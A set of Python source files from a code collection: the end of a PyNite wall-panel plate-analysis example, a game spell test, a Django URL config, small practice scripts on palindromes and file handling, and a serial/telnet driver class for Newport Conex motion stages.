'Combo 1')[index][0]\n count += 1\n elif quad.mNode.ID == node.ID:\n if force_type == 'Qx' or force_type == 'Qy':\n force += quad.shear(1, 1, 'Combo 1')[index][0]\n else:\n force += quad.moment(1, 1, 'Combo 1')[index][0]\n count += 1\n elif quad.nNode.ID == node.ID:\n if force_type == 'Qx' or force_type == 'Qy':\n force += quad.shear(-1, 1, 'Combo 1')[index][0]\n else:\n force += quad.moment(-1, 1, 'Combo 1')[index][0]\n count += 1\n\n # Calculate the average force at the node to smooth the results\n force = force/count\n\n # Add the total force at the node to the list of forces\n z.append(force)\n\n # Convert the lists to numpy arrays\n x = np.array(x)\n y = np.array(y)\n z = np.array(z)\n\n # Create a meshgrid for the X and Y-coordinates\n X, Y = np.meshgrid(x, y)\n\n # Reshape the node force results to fit the meshgrid\n z = z.reshape(num_rows, num_cols)\n\n fig, ax = plt.subplots()\n cs = ax.contourf(X, Y, z) #, 5)\n plt.colorbar(cs)\n ax.set(xlim=[0, max(x)], ylim=[0, max(y)], aspect=1)\n ax.set_title(force_type)\n plt.show()\n\n def plot_disp(self):\n \n # Determine the total number of nodes in the wall\n num_nodes = len(self.fem.Nodes)\n\n # Create a list of unique node X-coordinates\n x = []\n for i in range(num_nodes):\n x.append(self.fem.Nodes['N' + str(i + 1)].X)\n if self.fem.Nodes['N' + str(i + 2)].X < self.fem.Nodes['N' + str(i + 1)].X:\n break\n \n # Get the number of columns of nodes\n num_cols = len(x)\n \n # Determine how many rows of nodes\n num_rows = int(round(num_nodes/num_cols, 0))\n\n # Initialize a list of unique Y-coordinates\n y = [self.fem.Nodes['N1'].Y]\n y_prev = self.fem.Nodes['N1'].Y\n\n # Initialize the list of node displacement results\n z = []\n\n # Step through each node\n for node in self.fem.Nodes.values():\n\n # Add unique node Y-coordinates as we go\n if node.Y > y_prev:\n y.append(node.Y)\n y_prev = node.Y\n\n disp = node.DZ['Combo 1']\n\n # Add the 
total force at the node to the list of forces\n z.append(disp)\n\n # Convert the lists to numpy arrays\n x = np.array(x)\n y = np.array(y)\n z = np.array(z)\n\n # Create a meshgrid for the X and Y-coordinates\n X, Y = np.meshgrid(x, y)\n\n # Reshape the node force results to fit the meshgrid\n z = z.reshape(num_rows, num_cols)\n\n fig, ax = plt.subplots()\n cs = ax.contourf(X, Y, z) #, 5)\n plt.colorbar(cs)\n ax.set(xlim=[0, max(x)], ylim=[0, max(y)], aspect=1)\n ax.set_title('Displacement')\n plt.show()\n\n#%%\n# +-----------------------------------------------+\n# | Rectangular Wall Panel Implementation Example |\n# +-----------------------------------------------+\n\nE = 57000*(4000)**0.5*12**2 # psf\nt = 1 # ft \nwidth = 10 # ft\nheight = 20 # ft \nnu = 0.17\nmeshsize = 1 # ft\nload = 250 # psf\n\nmyWall = RectWall(width, height, t, E, nu, meshsize, 'Fixed', 'Fixed', 'Fixed', 'Fixed')\nmyWall.add_load(0, height, load, load)\n\n# Analyze the wall. Ignore the profiling code commented out below. That's for my use in speeding up\n# the program.\n# import cProfile\n# cProfile.run('myWall.analyze()', sort='cumtime')\nmyWall.analyze()\n\n# +-----------------------+\n# | Discussion of Results |\n# +-----------------------+\n\n# MITC4 elements are very accurate, but there are some nuances to be aware of. They are described\n# below.\n\n# Render the wall. The default load combination 'Combo 1' will be displayed since we're not\n# specifying otherwise. The quad mesh will be set to show 'Mx' results.\nfrom PyNite import Visualization\nVisualization.RenderModel(myWall.fem, text_height=meshsize/6, deformed_shape=False, combo_name='Combo 1', color_map='Mx', render_loads=True)\n\n# The it should be noted that the rendered contours are smoothed. Smoothing averages the corner\n# stresses from every quad framing into each node. This leads to a much more accurate contour.\n# An unsmoothed plot would essentially show quad center stresses at the quad element corners.\n\n# Here are the expected results from Timoshenko's \"Theory of Plates and Shells\" Table 35, p. 202.\n# Note that the deflection values for the PyNite solution are slightly larger, due to transverse\n# shear deformations being accounted for.\nD = E*t**3/(12*(1-nu**2))\nprint('Solution from Timoshenko Table 35 for b/a = 2.0:')\nprint('Expected displacement: ', 0.00254*load*width**4/D)\nprint('Expected Mx at Center:', 0.0412*load*width**2)\nprint('Expected Mx at Edges:', -0.0829*load*width**2)\nprint('Expected My at Center:', 0.0158*load*width**2)\nprint('Expected My at Top & Bottom:', -0.0571*load*width**2)\n\n# It should be noted that even the smoothed Mx contours are off by nearly 30% from the theoretical\n# solution at the wall boundaries. Because there are no adjacent quads at the boundaries, PyNite\n# cannot smooth the results there, and center stresses are being reported at the boundaries\n# instead of corner stresses. So what's really going on here? Read on!\n\n# MITC4 elements are very accurate, but the internal bending stress results at the corners are not.\n# They are secondary values extrapolated from the derivatives of primary values. The corner bending\n# stresses appear to more accurately represent the bending stresses at the center of the element.\n# While corner STRESSES have this problem, the corner FORCES do not. To find the bending stresses\n# at the quad nodes we'll get the moment at the corner and divide it by 1/2 of the plate width to\n# convert it to a stress result. 
Note that when we talk about quad \"stresses\" we're really talking\n# about forces per unit length of the element.\n\n# With 200 quads in the model, quad 101 is on the left edge of the wall at mid-height, and carries\n# the maximum moment.\n\n# Get the force vector for quad 101\nf_vector = myWall.fem.GetQuad('Q101').f()\n\n# Although the MITC4 element nodes are defined by the user in the order [i, j, m, n], internally\n# PyNite formulates the plate in the order [m, n, i, j] to be consistent with the literature used\n# to derive this element. Therefore the MITC4 element's force vector is arranged as follows:\n# ************************************************************************************************************************************************************\n# f vector: [[fx_m, fy_m, fz_m, mx_m, my_m, mz_m, fx_n, fy_n, fz_n, mx_n, my_n, mz_n, fx_i, fy_i, fz_i, mx_i, my_i, mz_i, fx_j, fy_j, fz_j, mx_j, my_j, mz_j]]\n# index: [[ 0 , 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 , 9 , 10 , 11 , 12 , 13 , 14 , 15 , 16 , 17 , 18 , 19 , 20 , 21 , 22 , 23 ]]\n# ************************************************************************************************************************************************************\n# nomenclature: fx_n = force in the local x-direction at the n-node\n# my_j = moment about the local y-axis at the j-node\n\n# We are interested in the moment applied to the i-node about the quad's local y-axis (my_i). This\n# is at index 16 in the f vector. Note that here Mx is the moment about the local y-axis, rather\n# than about its local x-axis. This can be confusing, but is a commonly used plate nomenclature.\nMx = f_vector[16, 0]\n\n# We can find the max My moment similarly from quad 6\nf_vector_6 = myWall.fem.GetQuad('Q6').f()\nMy = f_vector_6[15, 0]\n\n# Now we'll convert these values to a force per unit length. The height and width of the plate is\n# `meshsize`.\nMx = Mx/(meshsize/2)\nMy = My/(meshsize/2)\n\n# Print the correct maximum bending moments:\nprint('Calculated maximum Mx (back-calculated from quad nodal forces): ', Mx)\nprint('Calculated maximum My (back-calculated from quad nodal forces): ', My)\n\n# These values are much closer to the Timoshenko solution than the direct stress results. The Mx\n# solution is within 1%, and the My solution is within about 6%. That is very good convergence for\n# the 1'x1' mesh size. If the mesh size is reduced to 0.5' the My solution is within about 4% of\n# the Timoshenko solution. 
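# (Editorial aside, not in the original script: the percent comparisons quoted above
# can be made explicit with a small helper. The arguments are assumed to be a PyNite
# result and the corresponding Timoshenko reference value computed earlier.)
def pct_diff(calculated, expected):
    # Relative difference between a calculated value and a reference value, in percent.
    return abs(calculated - expected) / abs(expected) * 100

# For example: pct_diff(Mx, -0.0829*load*width**2)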
It should also be remembered that even the Timoshenko solution is an\n# estimate.\n","sub_path":"Examples/Out-of-Plane Wall Panel - Quads.py","file_name":"Out-of-Plane Wall Panel - Quads.py","file_ext":"py","file_size_in_byte":19183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"564500913","text":"from cntent.spells.fire.concepts import burning_hands_concept\nfrom cntent.spells.runes import double_damage_rune\nfrom mechanics.actives import Active\n\ndef test_burning_hands(empty_game, hero, pirate_band):\n\n spell = burning_hands_concept.to_spell([double_damage_rune])\n\n hero.int_base += 100\n empty_game.add_unit(hero, 1+1j, facing=1+0j)\n new_active = hero.give_active( Active.from_spell( spell ) )\n\n p1, p2, p3 = pirate_band\n\n empty_game.add_unit(p1, 2+1j)\n empty_game.add_unit(p2, 3+1j)\n empty_game.add_unit(p3, 4+1j)\n\n hero.activate(new_active)\n\n assert p1.health < p1.max_health\n assert p2.health < p2.max_health\n assert p3.health < p3.max_health\n\n\n\n\n\n\n","sub_path":"tests/content/spells/test_fire.py","file_name":"test_fire.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"299163474","text":"from django.conf.urls import patterns, url\nfrom . import views\n\n\nurlpatterns = [\n url(r'^ajax/filebrowser/$', views.filebrowser),\n url(r'^ajax/fileupload/$', views.upload_images),\n url(r'^ajax/imagelist/$', views.recent_photos),\n url(r\"^ajax/upload/$\", views.upload_images, name=\"upload_images\")\n]\n","sub_path":"icmgeneric/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"627271623","text":"#given string is palindrome or not\ndef ispalindrome(s):\n if s==s[::-1]:\n return True\n return False\n#n=input(\"enter the value\")\nif ispalindrome(\"malayalam\"):\n print(\"palindrome\")\nelse:\n print(\"not a palindrome\")\n\n\n\n","sub_path":"practice prgms/palindrome or not.py","file_name":"palindrome or not.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"514648441","text":"\n# To create a new text file:\n\nf = open(\"new_text_file.txt\", \"w+\") # This is to create a new text file, w+ is for writing into a text file\n\nfor i in range(10):\n f.write(\"This is the line {} \\n\".format(i)) # Writing data into the text file\n\nf.close() # Closing the file is very important\n\n# OR\n# Another way of writing the file\n\nocean = ['Pacific', 'Atlantic', 'Indian', 'Arctic', 'Southern']\n\nwith open(\"new_textfile_without_close_fnc\", \"w\") as new: # No need to close the file using this\n for items in ocean:\n new.write(\"This is ocean {} \\n\".format(items))\n\n\n# To append data into a file :\n\nf = open(\"new_text_file.txt\", \"a+\")\n\nfor i in range(3):\n f.write(\"Appended line {} \\n\".format(i))\n\nf.close()\n\n# OR\n\nwith open(\"new_textfile_without_close_fnc\", \"a\") as foo:\n for i in range(2):\n foo.write(\"Appended line {} \\n\".format(i))\n\n\n# To read the contents of the file:\n\nf = open(\"new_text_file.txt\", \"r\")\ntext = f.read()\nf.close() # We have always to close the file at the end using this method\n\nprint(text)\n\n# OR\n\n# This is the best way to read the file and we need not to close it at the end. 
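# (Editorial sketch, not in the original file: the `with` form used in this script is
# roughly equivalent to the try/finally pattern below, which is why no explicit
# close() call is needed.)
f = open("new_text_file.txt", "r")
try:
    txt = f.read()
finally:
    f.close()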
Python will close the file even if exception occurs in code\n\nwith open(\"new_text_file.txt\", \"r\") as foo:\n txt = foo.read()\n\n\nprint(txt)\nprint(foo.name)\nprint(foo.mode)\nprint(foo.closed)\n\nwith open(\"new_text_file.txt\", \"r\") as p:\n for line in p:\n print(line)\n\n # txt1 = p.readlines() # It will return the text lines in the form of list\n # print(txt1, end = '')\n\n\nwith open(\"new_text_file.txt\", \"r\") as rf:\n with open(\"test_copy.txt\", \"w\") as wf:\n for line in rf:\n wf.write(line) # Created a new file \"test_copy.txt and copied all the lines from new_text_file.txt\n\n# To copy the pictures, we need 'rb', 'wb' instead of 'r' and 'w' where b stands for binary","sub_path":"Basics/Working with different files in Python/Text File/textfile.py","file_name":"textfile.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"326407339","text":"from time import sleep\r\nfrom logging import debug\r\nimport telnetlib, serial\r\n\r\n#Should Modify:\r\n#Add method to class change serial timeout\r\n#Implement error checking at end of each write (TE)\r\n\r\nclass TimeoutError(Exception):\r\n \"\"\"An error to be thrown for movement timeout\"\"\"\r\n pass\r\n\r\nclass Conex_Device:\r\n '''Class for controlling the Newport Conex Stages\r\n \r\n Currently handles:\r\n - CONEX-AG-LS25\r\n - CONEX-AG-M100D\r\n '''\r\n\r\n DELAY = .05 #Number of seconds to wait after writing a message\r\n MVTIMEOUT = 600 #(MVTIMEOUTxDELAY)= number of seconds device will \r\n #wait before declaring a move timeout error\r\n \r\n def __init__(self):\r\n '''Constructor for Conex device'''\r\n\r\n # a variable to keep track of what kind of connection is open\r\n self.con_type = None\r\n \r\n #Other Instance Variables\r\n self.SN = 'DevNotOpenedYet' #Device serial number\r\n #self.SN also serves as flag to check if device has been opened\r\n self.TY = 'DevNotOpenedYet' #Device type\r\n self.FW = 'DevNotOpenedYet' #Device Revision Information\r\n self.lims = {} #Device limits\r\n\r\n #:::::::::::::::::::::::PORT MANAGEMENT FUNCTIONS:::::::::::::::::::::::::: \r\n def open_Serial(self, devnm:str, baud:int):\r\n \"\"\"Opens a serial connection to the device\r\n\r\n Also queries the device to obtain basic information to confirm communication\r\n\r\n Does not reopen the device if already open\r\n\r\n Args:\r\n devnm = the device name to connect to\r\n baud = the baudrate to connect at\r\n \"\"\"\r\n\r\n # if port is already open, return\r\n if not self.con_type is None:\r\n debug(\"(SN:{}) is already open\".format(self.SN))\r\n return\r\n\r\n debug(\"Connecting to serial: {}:{}...\".format(devnm, baud))\r\n self.con = serial.Serial()\r\n self.con.timeout = 3\r\n self.con.port = devnm\r\n self.con.baudrate = baud\r\n self.con.open()\r\n self.con_type = \"serial\"\r\n\r\n self.reqInfo()\r\n\r\n if self.TY.find(\"M100DD\") != -1:\r\n self.axes = {1:\"V\", 2:\"U\"}\r\n elif self.TY.find(\"LS25\") != -1:\r\n self.axes = {1:\"\"}\r\n elif self.TY.find(\"PR100P\") != -1:\r\n self.axes = {1:\"\"}\r\n else:\r\n raise Exception(\"Controller type not recognized: {}\".format(self.TY))\r\n\r\n debug('Device is a : %s \\n' %self.TY +\r\n 'Serial Number : %s \\n' %self.SN +\r\n 'Frameware vs. 
: %s \\n' %self.FW)\r\n \r\n self.reqLim()\r\n\r\n def open_Telnet(self, host:str, port:int):\r\n '''Opens a telnet connection to device\r\n Also queries the device to obtain basic information\r\n This serves to confirm communication\r\n *Does not reopen device if already open\r\n\r\n Args:\r\n host = the hostname of the telnet connection\r\n port = the port to connect to\r\n '''\r\n #Open port if not already open\r\n if not self.con_type is None:\r\n debug('(SN:%s) is already open' %self.SN)\r\n else:\r\n debug('Connecting to telnet: {}:{}...'.format(host, port))\r\n self.con = telnetlib.Telnet()\r\n self.con.open(host, port, 3)\r\n self.con_type = \"telnet\"\r\n \r\n #Send 'ID?' command to synchronize comms with device:\r\n #The first message sent after the device is powered up is \r\n #automatically ignored by the device. I did not want to send\r\n #'1RS' since this would reset the device everytime open() is called\r\n self.write('1ID?')\r\n self.readAll() #clear read buffer\r\n \r\n #Request Device Information\r\n self.reqInfo()\r\n \r\n if self.TY.find(\"M100D\") != -1:\r\n self.axes = {1:\"V\", 2:\"U\"}\r\n elif self.TY.find(\"LS25\") != -1:\r\n self.axes = {1:\"\"}\r\n elif self.TY.find(\"PR100P\") != -1:\r\n self.axes = {1:\"\"}\r\n else:\r\n raise Exception(\"Controller type not \"+\\\r\n \"recognized: {}\".format(self.TY))\r\n\r\n debug('Device is a : %s \\n' %self.TY +\r\n 'Serial Number : %s \\n' %self.SN +\r\n 'Frameware vs. : %s \\n' %self.FW )\r\n\r\n self.reqLim()\r\n \r\n def close(self):\r\n '''Closes the device connection'''\r\n if self.con_type is None:\r\n debug(\"Device is already closed\")\r\n else:\r\n self.con.close()\r\n self.con_type = None\r\n \r\n #:::::::::::::::::::::::WRITE/READ FUNCTIONS::::::::::::::::::::::::::::::: \r\n def write(self, MSG, append = None):\r\n '''Formats a string, 'MSG' and sends it to the device\r\n MSG should be the message as string (ex. 
'1ID?')\r\n Should NOT include CR\\LF\r\n Can append data (including numbers) to the end of the MSG\r\n *Data requests using 'write' should be followed by a read\r\n Otherwise unread items in buffer may cause problems\r\n **This function is useful for sending messages that do not\r\n have a dedicated function yet.\r\n '''\r\n #Check if port is open\r\n if self.con_type is None:\r\n debug('ERROR::: Device must be open\\n' + \r\n ' solution: call open()')\r\n return\r\n \r\n #convert 'append' and append to end\r\n if append != None:\r\n MSG = MSG + str(append)\r\n \r\n MSG = MSG + '\\n\\n'\r\n msg = MSG.encode()\r\n \r\n #Send message using telnet\r\n self.con.write(msg)\r\n \r\n def readAll(self):\r\n '''Returns the full read buffer or the first 50 lines\r\n Also serves as a 'flush' function to clear buffer itself\r\n Useful for debugging reads to ensure read data is as expected\r\n Returns the read data as bytes in bytearray\r\n Does NOT strip() CR\\LF at end of messages\r\n '''\r\n #Check if port is open\r\n if self.con_type is None:\r\n debug('ERROR::: Device must be open\\n' + \r\n ' solution: call open()')\r\n return\r\n\r\n cnt = 0\r\n resl = []\r\n res = self.read(tmt=.25)\r\n resl.append(res)\r\n while len(res) > 0 and cnt < 50:\r\n res = self.read(tmt=.25)\r\n resl.append(res)\r\n cnt += 1\r\n sleep(.05)\r\n if len(resl[-1]) == 0:\r\n resl.pop()\r\n return resl\r\n \r\n def read(self, tmt=1.0):\r\n '''Reads a single line from the readbuffer\r\n Strips the CR\\LF and decodes it into a string\r\n\r\n Inputs:\r\n tmt = timeout in seconds\r\n Returns:\r\n str = result of single-line read\r\n '''\r\n #Does not check if port is open to avoid slow-downs from checking\r\n #if port is open repeatedly when back-to-back reads are performed \r\n if self.con_type == \"telnet\":\r\n return self.con.read_until(bytes('\\r\\n', 'utf-8'), tmt).strip().decode('utf-8')\r\n elif self.con_type == \"serial\":\r\n self.con.timeout = tmt\r\n return self.con.readline().strip().decode(\"utf-8\")\r\n\r\n \r\n #:::::::::::::::::::::::STATE CHANGE FUNCTIONS:::::::::::::::::::::::::::::\r\n def home(self, isBlocking = False):\r\n '''Homes the device\r\n \r\n calls reset() first when called in isReady() or isMoving() state\r\n\r\n Inputs:\r\n isBlocking = True will block execution until homing completes\r\n Returns:\r\n -1 if no communication is open\r\n or\r\n str = the error code if an error occurred\r\n or\r\n None if there's no error\r\n '''\r\n #Check if port is open\r\n if self.con_type is None:\r\n debug('ERROR::: Device must be open\\n' + \r\n ' solution: call open()')\r\n return -1\r\n \r\n #Reset device to allow home() if needed\r\n if self.isReady() or self.isMoving(): self.reset()\r\n \r\n self.write('1OR') #execute home search\r\n \r\n #Check for errors\r\n erFlg, erCd = self.isError()\r\n if erFlg:\r\n debug('DEV ERROR::: Device returned error:\\n' +\r\n ' ' + self.errorStr(erCd))\r\n return erCd\r\n \r\n #Wait for move to complete when isBlocking is set\r\n if isBlocking:\r\n tmtItr = 0; #Iteration counter for timeout\r\n while self.isHoming():\r\n if tmtItr > self.MVTIMEOUT: \r\n raise TimeoutError(\"Timeout on home.\")\r\n sleep(self.DELAY)\r\n tmtItr += 1\r\n \r\n def reset(self):\r\n '''Reset the device\r\n\r\n Returns:\r\n -1 if no communication is open\r\n or\r\n str = the error code if an error occurred\r\n or\r\n None if there's no error\r\n '''\r\n #Check if port is open\r\n if self.con_type is None:\r\n debug('ERROR::: Device must be open\\n' + \r\n ' solution: call open()')\r\n return 
-1\r\n \r\n self.write('1RS') #execute home search\r\n sleep(10*self.DELAY) #reset takes time to execute\r\n \r\n #Check for errors\r\n erFlg, erCd = self.isError()\r\n if erFlg:\r\n debug('DEV ERROR::: Device returned error:\\n' +\r\n ' ' + self.errorStr(erCd))\r\n return erCd\r\n \r\n def stop(self):\r\n '''Stop all motion on the device\r\n\r\n Returns:\r\n -1 if no communication is open\r\n or\r\n str = the error code if an error occurred\r\n or\r\n None if there's no error\r\n '''\r\n #Check if port is open\r\n if self.con_type is None:\r\n debug('ERROR::: Device must be open\\n' + \r\n ' solution: call open()')\r\n return -1\r\n \r\n self.write('1ST') #execute home search\r\n \r\n #Check for errors\r\n erFlg, erCd = self.isError()\r\n if erFlg:\r\n debug('DEV ERROR::: Device returned error:\\n' +\r\n ' ' + self.errorStr(erCd))\r\n return erCd\r\n \r\n def enable(self):\r\n '''Disables the device (set 'Enable' state)\r\n\r\n Returns:\r\n -1 if Communication is not open\r\n or \r\n str = error code if there's an error\r\n or\r\n None if no error\r\n '''\r\n #Check if port is open\r\n if self.con_type is None:\r\n debug('ERROR::: Device must be open\\n' + \r\n ' solution: call open()')\r\n return -1\r\n \r\n self.write('1MM1') #enter enable state\r\n \r\n #Check for errors\r\n erFlg, erCd = self.isError()\r\n if erFlg:\r\n debug('DEV ERROR::: Device returned error:\\n' +\r\n ' ' + self.errorStr(erCd))\r\n return erCd\r\n\r\n def disable(self):\r\n '''Disables the device (set 'Disable' state)\r\n\r\n Returns:\r\n -1 if Communication is not open\r\n or \r\n str = error code if there's an error\r\n or\r\n None if no error\r\n '''\r\n #Check if port is open\r\n if self.con_type is None:\r\n debug('ERROR::: Device must be open\\n' + \r\n ' solution: call open()')\r\n return -1\r\n \r\n self.write('1MM0') #enter disable state\r\n \r\n #Check for errors\r\n erFlg, erCd = self.isError()\r\n if erFlg:\r\n debug('DEV ERROR::: Device returned error:\\n' +\r\n ' ' + self.errorStr(erCd))\r\n return erCd\r\n \r\n #:::::::::::::::::::::::STATE CHECK FUNCTIONS:::::::::::::::::::::::::::::: \r\n def isReady(self) -> bool:\r\n '''Checks that the device is in a 'Ready' state\r\n\r\n Returns: \r\n bool = whether or not the device is in a ready state\r\n or\r\n -1 if communication is not open\r\n '''\r\n #Check if port is open\r\n if self.con_type is None:\r\n debug('ERROR::: Device must be open\\n' + \r\n ' solution: call open()')\r\n return -1\r\n \r\n rd = []\r\n #get positioner error and controller state\r\n for axis in self.axes:\r\n self.write('1TS{}'.format(self.axes[axis]))\r\n rd.append(self.read())\r\n\r\n # state is in last two characters\r\n return all([item[-2:] in [\"32\", \"33\", \"34\", \"35\", \"36\"] for item in rd])\r\n \r\n def isDisable(self) -> bool:\r\n '''Checks that the device is in a 'Disable' state\r\n\r\n Returns: \r\n bool = whether or not the device is in a disable state\r\n or\r\n -1 if communication is not open\r\n '''\r\n #Check if port is open\r\n if self.con_type is None:\r\n debug('ERROR::: Device must be open\\n' + \r\n ' solution: call open()')\r\n return -1\r\n \r\n rd = []\r\n #get positioner error and controller state\r\n for axis in self.axes:\r\n self.write('1TS{}'.format(self.axes[axis]))\r\n rd.append(self.read())\r\n\r\n # state is in last two characters\r\n return all([item[-2:] in [\"3C\", \"3D\"] for item in rd])\r\n \r\n def isReferenced(self) -> bool:\r\n '''Checks that the device is in a 'Referenced' state\r\n\r\n Returns: \r\n bool = whether or not the 
device is in a referenced state\r\n or\r\n -1 if communication is not open\r\n '''\r\n #Check if port is open\r\n if self.con_type is None:\r\n debug('ERROR::: Device must be open\\n' + \r\n ' solution: call open()')\r\n return -1\r\n \r\n rd = []\r\n #get positioner error and controller state\r\n for axis in self.axes:\r\n self.write('1TS{}'.format(self.axes[axis]))\r\n rd.append(self.read())\r\n\r\n # state is in last two characters\r\n return all([item[-2:] in [\"0A\", \"0B\", \"0C\", \"0D\", \"0E\", \"0F\", \"10\"] for item in rd])\r\n \r\n def isConfiguration(self) -> bool:\r\n '''Checks that the device is in 'Configuration' state\r\n\r\n Returns: \r\n bool = whether or not the device is in configuration state\r\n or\r\n -1 if communication is not open\r\n '''\r\n #Check if port is open\r\n if self.con_type is None:\r\n debug('ERROR::: Device must be open\\n' + \r\n ' solution: call open()')\r\n return -1\r\n \r\n rd = []\r\n #get positioner error and controller state\r\n for axis in self.axes:\r\n self.write('1TS{}'.format(self.axes[axis]))\r\n rd.append(self.read())\r\n\r\n # state is in last two characters\r\n return all([item[-2:] == \"14\" for item in rd]) \r\n \r\n def isHoming(self) -> bool:\r\n '''Checks that the device is in 'Homing' state\r\n\r\n Returns: \r\n bool = whether or not the device is in homing state\r\n or\r\n -1 if communication is not open\r\n '''\r\n #Check if port is open\r\n if self.con_type is None:\r\n debug('ERROR::: Device must be open\\n' + \r\n ' solution: call open()')\r\n return -1\r\n \r\n rd = []\r\n #get positioner error and controller state\r\n for axis in self.axes:\r\n self.write('1TS{}'.format(self.axes[axis]))\r\n rd.append(self.read())\r\n\r\n # state is in last two characters\r\n return all([item[-2:] == \"1E\" for item in rd]) \r\n \r\n def isMoving(self, homing=True, ol=True) -> bool:\r\n '''Checks that the device is in 'Moving' state\r\n\r\n Inputs:\r\n homing = whether to check for homing as well\r\n ol = whether to check for open loop movement as well\r\n Returns: \r\n bool = whether or not the device is in moving state\r\n or\r\n -1 if communication is not open\r\n '''\r\n #Check if port is open\r\n if self.con_type is None:\r\n debug('ERROR::: Device must be open\\n' + \r\n ' solution: call open()')\r\n return -1\r\n \r\n rd = []\r\n #get positioner error and controller state\r\n for axis in self.axes:\r\n self.write('1TS{}'.format(self.axes[axis]))\r\n rd.append(self.read())\r\n\r\n # Closed loop movement\r\n ret = all([stat[-2:] == \"28\" for stat in rd]) \r\n # Open loop step and jog (respectively)\r\n if ol: ret = (ret or all([stat[-2:] in [\"29\", \"46\"] for stat in rd]))\r\n # Homing\r\n if homing: ret = (ret or all([stat[-2:] == \"1E\" for stat in rd]))\r\n \r\n return ret\r\n \r\n #:::::::::::::::::::::::MOVE FUNCTIONS::::::::::::::::::::::::::::::::::::: \r\n def moveAbs(self, newPOS:dict, isBlocking:bool = False) -> dict:\r\n '''Moves device to newPOS.values() mm from current position\r\n\r\n Inputs:\r\n newPOS = keys as axes, values as amt to move\r\n isBlocking = whether this function blocks program until done\r\n Returns:\r\n dict = key as axis, value as error code\r\n or\r\n -1 if communications aren't open\r\n or\r\n None if no error\r\n '''\r\n #Check if port is open\r\n if self.con_type is None:\r\n debug('ERROR::: Device must be open\\n' + \r\n ' solution: call open()')\r\n return -1\r\n\r\n #Check that all axes are valid\r\n if not all([1 if axis in self.axes else 0 for axis in newPOS]):\r\n msg = \"Invalid axis. 
Available axes: \" + str(list(self.axes.keys()))\r\n raise ValueError(msg)\r\n\r\n err = {}\r\n for axis in self.axes:\r\n #move absolute\r\n self.write('1PA{}{}'.format(self.axes[axis], newPOS[axis]))\r\n \r\n #Check for errors\r\n erFlg, erCd = self.isError()\r\n if erFlg:\r\n debug('DEV ERROR::: Device returned error:\\n' +\\\r\n ' ' + self.errorStr(erCd))\r\n err[axis] = erCd\r\n\r\n #Wait for move to complete when isBlocking is set\r\n if isBlocking:\r\n tmtItr = 0; #Iteration counter for timeout\r\n while self.isMoving():\r\n if tmtItr > self.MVTIMEOUT:\r\n msg = \"Timeout on absolute move: {}\".format(relMOV)\r\n raise TimeoutError(msg)\r\n sleep(self.DELAY)\r\n tmtItr += 1\r\n\r\n if len(err) > 0: return err\r\n else: return\r\n \r\n def moveRel(self, relMOV:dict, isBlocking:bool = False) -> dict:\r\n '''Moves device relMOV.values() mm from current position\r\n\r\n Inputs:\r\n relMOV = keys as axes, values as amt to move\r\n isBlocking = whether this function blocks program until done\r\n Returns:\r\n dict = key as axis, value as error code\r\n or\r\n -1 if communications aren't open\r\n or\r\n None if no error\r\n '''\r\n #Check if port is open\r\n if self.con_type is None:\r\n debug('ERROR::: Device must be open\\n' + \r\n ' solution: call open()')\r\n return -1\r\n\r\n #Check that all axes are valid\r\n if not all([1 if axis in self.axes else 0 for axis in relMOV]):\r\n msg = \"Invalid axis. Available axes: \" + str(list(self.axes.keys()))\r\n raise ValueError(msg)\r\n\r\n err = {}\r\n for axis in self.axes:\r\n #move relative\r\n self.write('1PR{}{}'.format(self.axes[axis], relMOV[axis]))\r\n \r\n #Check for errors\r\n erFlg, erCd = self.isError()\r\n if erFlg:\r\n debug('DEV ERROR::: Device returned error:\\n' +\\\r\n ' ' + self.errorStr(erCd))\r\n err[axis] = erCd\r\n\r\n #Wait for move to complete when isBlocking is set\r\n if isBlocking:\r\n tmtItr = 0; #Iteration counter for timeout\r\n while self.isMoving():\r\n if tmtItr > self.MVTIMEOUT:\r\n msg = \"Timeout on relative move: {}\".format(relMOV)\r\n raise TimeoutError(msg)\r\n sleep(self.DELAY)\r\n tmtItr += 1\r\n\r\n if len(err) > 0: return err\r\n else: return\r\n\r\n #:::::::::::::::::::::::ERROR CHECK FUNCTIONS:::::::::::::::::::::::::::::: \r\n def isError(self):\r\n #Uses TE to reduce read time\r\n '''Checks for device errors\r\n Returns:\r\n boolean True/False to mark if an error occurred\r\n str with error code returned by device\r\n '''\r\n #Check if port is open\r\n if self.con_type is None:\r\n debug('ERROR::: Device must be open\\n' + \r\n ' solution: call open()')\r\n return -1\r\n \r\n #Read error\r\n self.write('1TE') #get command error string\r\n rd = self.read()\r\n \r\n #Check if error occurred and return accoridingly\r\n erCd = rd[3:]\r\n erFlg = False\r\n if erCd != '@':\r\n #error occurred\r\n erFlg = True\r\n return erFlg, erCd\r\n \r\n def errorStr(self, erCd):\r\n '''Translates the error code ,'erCd', to a readable string\r\n Returns:\r\n str with text describing the error code\r\n *If device is not open(), the code itself is returned\r\n '''\r\n #Check if port is open\r\n if self.con_type is None:\r\n debug('WARNING::: Device must be open to translate string\\n' + \r\n ' solution: call open()')\r\n return erCd\r\n \r\n #Send error code to device for translation\r\n self.write('1TB{}'.format(erCd)) #get command error string\r\n rd = self.read() \r\n \r\n if rd[3:4] != erCd:\r\n debug('ERRORR::: Device did not recognize provided error code')\r\n return 'Unrecognized Error Provided: ' + erCd\r\n 
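            # (Editorial note: the '1TB' reply echoes the queried error code at
            # position 3, so a mismatch there means the controller did not recognize
            # the code and only the raw code can be returned above.)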
